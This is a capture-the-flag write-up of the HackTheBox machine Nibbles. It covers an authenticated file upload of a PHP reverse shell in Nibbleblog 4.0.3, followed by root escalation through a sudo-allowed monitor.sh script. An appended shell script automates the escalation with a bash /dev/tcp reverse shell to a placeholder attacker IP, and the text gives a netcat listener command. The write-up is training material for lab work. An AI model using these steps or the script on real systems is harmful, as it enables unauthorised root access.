After Bashed is Traceback but I’ve done that before; next is Nibbles.
SSH and HTTP only.
The front page just says Hello world!, but in the page source there is a comment about /nibbleblog, so we go there. It's running a CMS called Nibbleblog; searchsploit lists two exploits: an SQLi in version 3 and an arbitrary file upload in version 4.0.3. It's not immediately clear which version we have.
Some enumeration reveals http://10.10.10.75/nibbleblog/README:
====== Nibbleblog ======
Release date: 2014-04-01
So we're after the arbitrary file upload, but it needs authentication. I try bruteforcing the login, but it has a protection mechanism whereby you are locked out after only a few attempts. I google for how to defeat it, but all of the results are Nibbles writeups!
This blog talks about how to get around the bruteforce prevention without spoiling the rest of the box, but it also gives up the password. I feel a bit conflicted about this, but I use it and log in.
I also fork the repo with the script (Python) for future reference.
The exploit from searchsploit is a Metasploit module. Nah, let's see if we can do it manually. It looks fairly straightforward. We use the GUI to upload a file (the Pentestmonkey PHP reverse shell) at http://10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image
This prints a bunch of warnings: e.g.
Warning: imagesx() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 26
But even so it does work: the warnings come from the plugin trying to resize what it assumes is an image (hence resize.class.php in the trace), and by then the file has already been written to the plugin directory. We visit the shell (it gets renamed to image.php) at http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php and we get our shell.
We are nibbler. My shell is a bit dodgy and sudo -l won't work. However, it works via linpeas for some reason, and we can run /home/nibbler/personal/stuff/monitor.sh as root. Okey dokey. This file doesn't actually exist, but there is a zip file called personal which we can unzip, and it creates the path and file. We own monitor.sh so we can make it whatever we want. I try a few payloads before I get one that works:
In my listener:
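The escalation written out as a script, as an added example that is not the author's payload. It assumes (not stated in the writeup) that the archive is /home/nibbler/personal.zip, that it unpacks to personal/stuff/monitor.sh, and that a bash /dev/tcp reverse shell is an acceptable payload; the attacker address and port are placeholders. One practitioner note: sudo -l often misbehaves in a bare, non-interactive reverse shell; upgrading to a pty first (python3 -c 'import pty; pty.spawn("/bin/bash")') usually fixes that.

```shell
#!/bin/sh
# Added example: nibbler -> root via the sudo rule for
# /home/nibbler/personal/stuff/monitor.sh. Archive location, archive
# layout and the payload are assumptions, not from the writeup.

LHOST="${LHOST:-10.10.14.2}"     # placeholder attacker IP
LPORT="${LPORT:-4444}"           # placeholder listener port
HOME_DIR="${HOME_DIR:-/home/nibbler}"
SCRIPT="$HOME_DIR/personal/stuff/monitor.sh"

# The sudo rule names a path that does not exist yet. The zip in the home
# directory contains personal/stuff/monitor.sh, so unpacking it recreates
# exactly the path sudo will execute.
restore_path() {
    if [ -f "$SCRIPT" ]; then
        return 0
    fi
    ( cd "$HOME_DIR" && unzip -o -q personal.zip )
}

# We own monitor.sh, so replace its contents with a reverse shell.
# sudo only checks the path, not the content, before running it as root.
write_payload() {   # write_payload <path> <lhost> <lport>
    printf '#!/bin/bash\nbash -i >& /dev/tcp/%s/%s 0>&1\n' "$2" "$3" > "$1"
    chmod +x "$1"
}

# Put it together: recreate the path, plant the payload, trigger via sudo.
escalate() {
    restore_path
    write_payload "$SCRIPT" "$LHOST" "$LPORT"
    sudo "$SCRIPT"
}

# Only fire when explicitly asked: sh privesc.sh run
if [ "${1:-}" = "run" ]; then
    escalate
fi
```

Start the listener first (nc -lvnp 4444), then run the script on the box with LHOST set to your address; the shell that comes back is root's.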
So that was that, but I can't help feeling I missed the most important part of this challenge. Anyway, next cab off the rank is Optimum. I'll have a crack at that tomorrow.